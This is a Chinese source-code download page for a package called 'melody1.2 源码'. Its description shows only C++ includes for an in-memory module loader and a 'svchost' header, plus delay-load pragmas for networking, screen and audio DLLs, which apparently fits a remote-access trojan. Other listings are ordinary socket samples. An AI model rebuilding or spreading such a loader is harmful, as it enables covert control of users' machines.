登录
首页 » Windows Socket编程 » melody1.2 源码

melody1.2 源码

于 2022-08-24 发布 文件大小:3.61 MB
0 73
下载积分: 2 下载次数: 1

代码说明:

#include "MemoryModule.h" #include "resource.h" #include "C_svchost.h" typedef int (WINAPI *PFN_POPMSGBOX)(void); #pragma comment(linker, "/DELAYLOAD:WININET.dll") #pragma comment(linker, "/DELAYLOAD:WS2_32.dll") #pragma comment(linker, "/DELAYLOAD:PSAPI.DLL") #pragma comment(linker, "/DELAYLOAD:GDI32.dll") #pragma comment(linker, "/DELAYLOAD:ADVAPI32.dll") #pragma comment(linker, "/DELAYLOAD:SHELL32.dll") #pragma comment(linker, "/DELAYLOAD:SHLWAPI.dll") #pragma comment(linker, "/DELAYLOAD:MSVFW32.dll") #pragma comment(linker, "/DELAYLOAD:WINMM.dll") #pragma comment(linker, "/DELAYLOAD:USER32.dll") #pragma comment(linker, "/DELAYLOAD:WTSAPI32.dll") #pragma comment(linker, "/DELAYLOAD:IMM32.dll") #pragma comment(linker, "/DELAY:nobind") #pragma comment(linker, "/DELAY:unload") #pragma comment(lib, "DELAYIMP.LIB") #pragma comment(linker, "/DELAYLOAD:USER32

下载说明:请别用迅雷下载,失败请重下,重下不扣分!

发表评论

0 个回复

  • 利用Winsock做的网络
    利用Winsock做的网络程序-do Winsock Network Program
    2023-03-25 10:30:04下载
    积分:1
  • prg5_2.c : UDP客户。该序通过命令行参数输入服务器IP地址和发给服务器的信息,然后执行UDP套接字客户端的基本过。...
    prg5_2.c : UDP客户。该程序通过命令行参数输入服务器IP地址和发给服务器的信息,然后执行UDP套接字客户端的基本过程。-prg5_2.c : UDP customers. The program command line parameter input server IP addresses and the information sent to the server, then the implementation of UDP socket client the basic process.
    2022-02-18 16:12:15下载
    积分:1
  • 驱动中不用协议驱动就可以获取mac地址的代码
    驱动中不用协议驱动就可以获取mac地址的代码-Driver protocol driver could not get mac address code. . . .
    2022-11-04 20:20:03下载
    积分:1
  • VB TCP Chat procedure, and use windows socket achieve.
    用VB实现的TCP聊天程序,利用windows socket实现。-VB TCP Chat procedure, and use windows socket achieve.
    2022-11-10 20:50:03下载
    积分:1
  • 小型网络聊天系统
    小型网络聊天系统-small Web Chat System
    2022-05-12 17:24:07下载
    积分:1
  •  各个线任务分配是这样实现的。在开始下载时,文件平均分成若干块进行下载。如第一个线一开始的任务是从文件的0位置开始下载一直到72908位置处。线1每次下载...
     各个线程任务分配是这样实现的。在开始下载时,文件平均分成若干块进行下载。如第一个线程一开始的任务是从文件的0位置开始下载一直到72908位置处。线程1每次下载一块数据后就要调整任务,如第一次下载了20800字节的数据,那么线程1的任务将改为:20800-72908。如此下去,直到任务为72908-72908时表示线程1完成了当前的下载任务。此时,线程1就分析各个线程的任务,找出任务最为繁忙的一个线程:如线程3:14816-218724。那么线程1就自动去调整任务,拿50%的任务来再次下载。周而复始直到各个线程都完成任务。不过这里有一点需要注意:为了避免重复下载部分数据,在调整任务的时候,起始的文件便移量必须加上接受缓冲器的字节数,因为如前面所举的列子来看。线程1和线程3在平衡负载的时候,线程正在下载数据,如果所剩的数据比接受缓冲器的大小还小,线程1和线程3的部分下载数据将会重复。   在调整任务和分析任务的时候,会发现一个问题。就是读取文件数据太过频繁。于是我用了一个数据结构。在下载文件的过程中始终打开配置文件,这样速度提高了很多。在文件下载完毕后关闭文件。-various threads assignment is achieved. At the beginning of the download, the paper divided into a number of pieces of the download. As a thread of a task is to start from the position paper of 0 to start the download has 72,908 locations Department. Thread a download each one will have to adjust the data tasks, such as the first downloaded 20,800 gigabytes of data, then threaded a task will be re :20800- 72908. This situation continues until the mandate of 72908-72908 said threaded a completion of the cu
    2022-03-20 03:50:55下载
    积分:1
  • Programming Tutorial WinSocket used, can be used to look at
    winsocket编程用的教程,用的到的可以看一下-Programming Tutorial WinSocket used, can be used to look at
    2022-08-24 04:33:17下载
    积分:1
  • dreamweaver2004 as a tool to develop the Guide asp, they include the source ~
    一个以dreamweaver2004为工具开发asp的教程,里面包括了源码~-dreamweaver2004 as a tool to develop the Guide asp, they include the source ~
    2023-01-17 07:35:03下载
    积分:1
  • 聊天序,主要系统调用,包括:套接字()
    聊天程序,主要的系统调用包括:socket()-创建Socket;bind()-将创建的Socket与本地端口绑定;connect()与accept()-建立Socket连接;listen()-服务器监听是否有连接请求;send()-数据的可控缓冲发送;recv()-可控缓冲接收;closesocket()-关闭Socket。-Chat program, the main system calls, including: socket ()- Create Socket bind ()- will create a Socket with the local port binding connect () and accept ()- establish a Socket connection listen ()- server monitor whether there is connection requests send ()- data buffer to send controllable recv ()- controllable receiver buffer closesocket ()- Close Socket.
    2023-06-10 19:15:03下载
    积分:1
  • 对NDIS开发资料整理,分了6个部分,做了一个完整的目录
    对NDIS开发资料整理,分了6个部分,做了一个完整的目录-NDIS
    2022-09-21 17:10:03下载
    积分:1
  • 696518资源总数
  • 104349会员总数
  • 32今日下载